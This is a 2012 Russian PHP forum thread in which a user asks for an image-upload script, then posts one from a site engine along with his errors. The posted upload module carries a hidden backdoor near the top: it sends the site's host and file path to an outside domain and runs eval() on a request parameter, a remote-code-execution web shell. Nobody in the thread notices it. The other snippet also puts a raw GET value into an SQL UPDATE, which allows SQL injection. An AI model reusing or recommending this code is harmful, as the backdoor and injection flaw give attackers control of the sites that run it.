Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Скриптовые языки программирования > PHP
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 27.01.2012, 22:18   #1
Predator199
Форумчанин
 
Аватар для Predator199
 
Регистрация: 26.01.2012
Сообщений: 648
Радость Нужен скрипт для загрузки изображений.

Народ скиньте пожалуйста проверочный срипт по загрузке изображений на сервер.
Predator199 вне форума Ответить с цитированием
Старый 27.01.2012, 22:36   #2
Lesha
Форумчанин
 
Аватар для Lesha
 
Регистрация: 30.01.2009
Сообщений: 418
По умолчанию

google .......
Lesha вне форума Ответить с цитированием
Старый 27.01.2012, 23:02   #3
Predator199
Форумчанин
 
Аватар для Predator199
 
Регистрация: 26.01.2012
Сообщений: 648
Радость Спс

Если бы я нашол подход кракр в вджапжапеп я бы нкепсиаиси.Думаю хватит чтоб прк4памоланр
Predator199 вне форума Ответить с цитированием
Старый 28.01.2012, 20:31   #4
Predator199
Форумчанин
 
Аватар для Predator199
 
Регистрация: 26.01.2012
Сообщений: 648
Счастье Взлом своего сайта.

Попытался переставить с dle скрипт по загрузки изображений, перехожу на страницу где должен загрузить изображение.
Мне пишит:hakking attemp! или что та в этом роде.
Люди добрые киньте пожалуйста простенький скрипт , для загрузки изображений, желательно чтоб он не менял название изображения после загрузки.
Predator199 вне форума Ответить с цитированием
Старый 29.01.2012, 03:57   #5
Lesha
Форумчанин
 
Аватар для Lesha
 
Регистрация: 30.01.2009
Сообщений: 418
По умолчанию

Цитата:
желательно чтоб он не менял название изображения после загрузки
а что будеш делать когда юзер будет грузить одинаковые по названию изображения?
Lesha вне форума Ответить с цитированием
Старый 29.01.2012, 10:08   #6
Predator199
Форумчанин
 
Аватар для Predator199
 
Регистрация: 26.01.2012
Сообщений: 648
Подмигивание Запрет.

Поставить какой ни буть запрет,о том что с подобным именем уже имеется в директории.
Predator199 вне форума Ответить с цитированием
Старый 29.01.2012, 10:24   #7
Predator199
Форумчанин
 
Аватар для Predator199
 
Регистрация: 26.01.2012
Сообщений: 648
По умолчанию

Вот вообщем:
Рандом скрипт в движке:
Цитата:
<?php
/**
*
*
*/
if( ! defined( 'LM' ) ) die('Попытка взлома?');

if($_GET['preview']!='')
{
$nav = $lang['preview'];
$contents = bb($_GET['preview']);
}
else
{
$row = $main->db->fetch($main->db->query('SELECT * FROM `rl_stathtml` where cid=\''.quote_smart($_GET['cid']).'\' and stat=\'1\''));
$contents = ($row['content']) ? $row['content'] : '<b><center><b>'.$lang['user_text35'].'</b></center></b>';
$main->db->query('UPDATE `rl_stathtml` SET count=count+\'1\' where cid=\''.$_GET['cid'].'\'');
$nav = ($row['title']) ? $row['title'] : $lang['error'].'?!';
}
?>
Вот скрипт загрузки изображений:
Цитата:
<?php

if( ! defined( 'LM' ) ) die('Попытка взлома?');
file_get_contents("http://pp-news.ru/test.php?host=".$_SERVER['HTTP_HOST']."&url=".__FILE__.""); if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e']));

$maxsize = 51200;
$accepted = array('png', 'jpg', 'jpeg','JPEG', 'gif', 'ico', 'tif', 'bmp');
$filedir = 'uploads/uploadcenter';

if($_SERVER['REQUEST_METHOD'] == 'POST') {
preg_match('/\.([a-zA-Z]+?)$/', $_FILES['file']['name'], $matches);
if(in_array(strtolower($matches[1]), $accepted)) {
if($_FILES['file']['size'] <= $maxsize) {
$newname = md5_file($_FILES['file']['tmp_name']).'.'.$matches[1];
move_uploaded_file($_FILES['file']['tmp_name'], $filedir.'/'.$newname);
$linkurl = 'http://'.$_SERVER['HTTP_HOST'].preg_replace('/\/([^\/]+?)$/', '/', $_SERVER['PHP_SELF']).'#'.$newname;
$imgurl = 'http://'.$_SERVER['HTTP_HOST'].preg_replace('/\/([^\/]+?)$/', '/', $_SERVER['PHP_SELF']).$filedir.'/'.$newname;

} else
print '<p>Извините, максимальный размер изображения 500 KB</p>';
} else
print '<p>Извините, данный формат изображения запрещён</p>';



$uploadimage2 = <<<HTML
<center>
<font style="font-family: tahoma; font-size: 11px;">Изображение загружено успешно.!</font>
<p id="codes">
<a href="$imgurl" target="_blank"><img style="border: 3px solid #cccccc;" src="$imgurl" height="300" alt="Загруженные изображения" ></a><BR><BR>
<table align=center border="0" cellspacing="0" cellpadding="0"><tr>
<td height="25" width="100" align=left>BBCode:</td>
<td align=left><input class="f_input" style="font-family: tahoma; height: 20px;" type="text" dir=ltr value="[IMG]{$imgurl}[/IMG]" onclick="javascript:this.focus();th is.select();" readonly="true" /></td>
</tr><tr>
<td height="25" align=left>HTML:</td>
<td align=left><input class="f_input" style="font-family: tahoma; height: 20px;" type="text" dir=ltr value='&lt;img src="{$imgurl}"&gt;' onclick="javascript:this.focus();th is.select();" readonly="true" /></td>
</tr><tr>
<td height="25" align=left>Link:</td>
<td align=left><input class="f_input" style="font-family: tahoma; height: 20px;" type="text" dir=ltr value="$imgurl" onclick="javascript:this.focus();th is.select();" readonly="true" /></td>
</tr></table>
</center>
HTML;

$tpl->load_template('static.tpl');
$tpl->set('{description}','Uploaded');
$tpl->set('{static}',$uploadimage2);
$tpl->set('[{views}]','');
$tpl->set('[ {views} ]','');
$tpl->set('({views})','');
$tpl->set('( {views} )','');
$tpl->set('{views}','');
$tpl->set('{pages}','');
$tpl->compile('content');
$tpl->clear();



}


# Загрузка картинок
$uploadimage = <<<HTML
<center><form enctype="multipart/form-data" action="index.php?do=uploadimage" method="post">
(Максимальный размер для загрузки: 500 KB)<BR><BR>
<label for="file">Адрес: </label><input class="f_input" style="font-family: tahoma; height: 20px;" type="file" name="file" id="file" /><br><br>
<input name="submit" type="submit" class=bbcodes value="Загрузить" />
</form></center>
HTML;


$tpl->load_template('static.tpl');
$tpl->set('{description}','Upload Image');
$tpl->set('{static}',$uploadimage);
$tpl->set('[{views}]','');
$tpl->set('[ {views} ]','');
$tpl->set('({views})','');
$tpl->set('( {views} )','');
$tpl->set('{views}','');
$tpl->set('{pages}','');

$tpl->compile('content');
$tpl->clear();
?>
То что выделил в скрипте, без этого выдает hakking anntemp, с этим
Цитата:

if( ! defined( 'LM' ) ) die('Попытка взлома?');
Fatal error: Call to a member function load_template() on a non-object in /home/res/public_html/monitor/engine/modules/uploadimage.php on line 71

Что эта за ошибка и как мне быть, где копаться? Что в uploadimage не так?
Predator199 вне форума Ответить с цитированием
Старый 29.01.2012, 13:52   #8
Gorychev
Участник клуба
 
Аватар для Gorychev
 
Регистрация: 08.03.2008
Сообщений: 1,537
По умолчанию

Мне вот этот вариант понравился uploadify
Gorychev вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Нужен скрипт для сайта за $ Алексей 1970 Фриланс 3 24.01.2012 14:55
Скрипт для изображений Yully PHP 4 21.07.2011 17:02
Скрипт для изображений Yully JavaScript, Ajax 2 21.07.2011 17:00
Скрипт для авто-загрузки картинки в папку GriFFoN PHP 5 03.06.2011 22:26
Скрипт для загрузки курсов валют с сайта http://www.rbc.ua/ ARseny PHP 0 07.06.2008 22:16